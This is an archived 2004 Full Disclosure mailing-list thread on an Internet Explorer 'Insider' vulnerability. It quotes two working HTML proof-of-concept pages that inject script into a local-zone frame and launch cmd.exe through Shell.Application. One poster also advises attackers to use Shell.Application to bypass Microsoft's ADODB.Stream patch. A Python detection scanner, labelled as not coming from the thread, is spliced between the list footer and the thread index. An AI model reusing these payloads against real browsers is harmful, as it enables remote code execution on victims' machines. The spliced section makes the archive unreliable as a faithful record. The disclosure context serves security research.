Full Disclosure mailing list archives
RE: THE VULNERABILITY STILL WORKS AFTER TODAY'S PATCH
From: <liudieyu () umbrella name>
Date: Sat, 3 Jul 2004 15:24:55 -0000
at the very beginning, using shell.application is not "another" way - it's actually the only solution available for the general public. most of the profitable systems to crack today have norton.antivirus.enterprise.xxxx installed - which means MS-ITS & Adodb.Stream are disabled. i must admit, norton.antivirus did stop the insider exploit - this time.

so, a real malicious attacker with normal intel would never simply copy the public exploit (which involves MS-ITS and ADODB.STREAM) and send it to his targets - he'll use shell.application instead of adodb.stream.

the weirdest thing is the following fact: norton is securing windows faster than microsoft. (the latter is the OS PRODUCER, while the former is ANTIVIRUS)

Jelmer <jkuperus () planet nl> said:
Well it's not quite as easy as you make it sound. I think you only took a look at http-equiv's example I posted to full disclosure and based your post on that. You see this:

--snip--
<iframe src="c:\windows\web\tip.htm" style="width:400px;height:200px;"></iframe>
<textarea id="code" style="display:none;">
injected.
<script language="JScript" DEFER>
alert('attempting injection');
var obj=new ActiveXObject("Shell.Application");
obj.ShellExecute("cmd.exe","/c pause");
</script>
</textarea>
<script language="javascript">
function doit() {
  document.frames[0].document.body.insertAdjacentHTML('afterBegin', document.all.code.value);
}
setTimeout("doit()", 2000);
</script>
--snip--

Doesn't work, it gives an access denied exception. But this..

--snip--
<iframe src="shell:windows\web\tip.htm" style="width:400px;height:200px;"></iframe>
<textarea id="code" style="display:none;">
injected.
<script language="JScript" DEFER>
alert('attempting injection');
var obj=new ActiveXObject("Shell.Application");
obj.ShellExecute("cmd.exe","/c pause");
</script>
</textarea>
<script language="javascript">
function doit() {
  document.frames[0].document.body.insertAdjacentHTML('afterBegin', document.all.code.value);
}
setTimeout("doit()", 2000);
</script>
--snip--

..does, notice the subtle difference. The iframe in the 2nd example is set to shell:windows\web\tip.htm instead of the hard coded c:\windows\web\tip.htm. And it works.

It was http-equiv who probably by a mixture of luck and gut instinct through experience found this out when we were doing some mailing back and forth to tackle some unrelated problem. If you'd actually tried to exploit it you would have known this.

-----Original Message-----
From: full-disclosure-admin () lists netsys com [mailto:full-disclosure-admin () lists netsys com] On Behalf Of liudieyu () umbrella name
Sent: Saturday 3 July 2004 3:28
To: bugtraq () securityfocus com; NTBugtraq () listserv ntbugtraq com; full-disclosure () lists netsys com
Subject: [Full-disclosure] THE INSIDER VULNERABILITY STILL WORKS AFTER TODAY'S PATCH

FROM: Liu Die Yu - http://umbrella.name/
TO : bugtraq () securityfocus com, NTBugtraq () listserv ntbugtraq com, full-disclosure () lists netsys com
SUBJ: THE INSIDER VULNERABILITY STILL WORKS AFTER TODAY'S PATCH
DATE: 2004/07/03 UTC+800

BODY:

[background]
the latest 0day remote compromise exploit for internet explorer was found being used in the wild. :-)
"the-insider" exploit was first noticed by the-insider:
http://umbrella.name/iebug.com/display-singlemessage.php?readmsg:fulldisclosure_message-2004060050
and then documented by jelmer:
http://umbrella.name/iebug.com/display-singlemessage.php?readmsg:fulldisclosure_message-2004060124
http://62.131.86.111/analysis.htm
microsoft just released:
Critical Update for Microsoft Data Access Components - Disable ADODB.Stream object from Internet Explorer (KB870669)
http://www.microsoft.com/downloads/details.aspx?FamilyID=4D056748-C538-46F6-B7C8-2FBFD0D237E3&DisplayLang=en
which kills the old exploit.

[FIX FOR THE PATCH]
use Shell.Application instead.

[service]
both "attack service" (finding bugs) and "defense service" (securing systems): http://umbrella.name/

[greetings]
malware ( http://www.malware.com/ ) who found Shell.Application.

[signature]
LIUDIEYU liudieyu AT umbrella . name
-- _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
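As an added defender-side example (not code from the thread or from any of its participants): a small Python scanner that flags HTML carrying the indicators the two snippets above share or differ on, namely an iframe whose src uses the shell: handler, instantiation of the Shell.Application ActiveX control, and markup injected into a frame through insertAdjacentHTML. The two sample documents are constructed here to mirror the c:\ and shell: variants, and the severity labels are an assumption.

```python
import re
from html.parser import HTMLParser

# Indicators from the thread: iframe src on the shell: handler, the
# Shell.Application ActiveX control, and insertAdjacentHTML into a frame.
SHELL_PROTO = re.compile(r"^\s*shell:", re.IGNORECASE)
ACTIVEX_SHELL = re.compile(
    r"ActiveXObject\s*\(\s*['\"]Shell\.Application['\"]\s*\)", re.IGNORECASE)
FRAME_INJECT = re.compile(
    r"frames\s*\[\s*\d+\s*\].*?insertAdjacentHTML", re.IGNORECASE | re.DOTALL)

class _Collector(HTMLParser):
    """Gather iframe src attributes plus all text and script data."""
    def __init__(self):
        super().__init__()
        self.iframe_srcs, self.text = [], []
    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.iframe_srcs += [v for k, v in attrs if k == "src" and v]
    def handle_data(self, data):
        self.text.append(data)

def scan_html(html):
    """Return matched indicators and a severity label (labels are assumed)."""
    p = _Collector()
    p.feed(html)
    body = "".join(p.text)
    hit = {
        "shell_protocol_iframe": any(SHELL_PROTO.search(s) for s in p.iframe_srcs),
        "shell_application_activex": bool(ACTIVEX_SHELL.search(body)),
        "frame_injection": bool(FRAME_INJECT.search(body)),
    }
    if all(hit.values()):
        hit["severity"] = "high"    # the shell: variant the thread says works
    elif hit["shell_application_activex"]:
        hit["severity"] = "medium"  # c:\ variant: access denied, still hostile
    else:
        hit["severity"] = "none"
    return hit

# Constructed samples mirroring the two snippets quoted in the thread.
_PAGE = r"""<iframe src="{src}" style="width:400px;height:200px;"></iframe>
<textarea id="code" style="display:none;">
<script language="JScript" DEFER>var obj=new ActiveXObject("Shell.Application");</script>
</textarea>
<script>function doit(){{document.frames[0].document.body.insertAdjacentHTML('afterBegin',document.all.code.value);}}</script>"""
SAMPLE_C_PATH = _PAGE.format(src=r"c:\windows\web\tip.htm")
SAMPLE_SHELL = _PAGE.format(src=r"shell:windows\web\tip.htm")
```

Run against captured mail or proxied HTML, the "high" label isolates the shell: variant that bypasses the zone check, while the c:\ variant still surfaces as "medium" because the ActiveX instantiation alone is hostile.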
Current thread:
- THE INSIDER VULNERABILITY STILL WORKS AFTER TODAY'S PATCH liudieyu (Jul 02)
- RE: THE VULNERABILITY STILL WORKS AFTER TODAY'S PATCH Jelmer (Jul 03)
- RE: THE VULNERABILITY STILL WORKS AFTER TODAY'S PATCH liudieyu (Jul 03)
- RE: THE VULNERABILITY STILL WORKS AFTER TODAY'S PATCH Jelmer (Jul 03)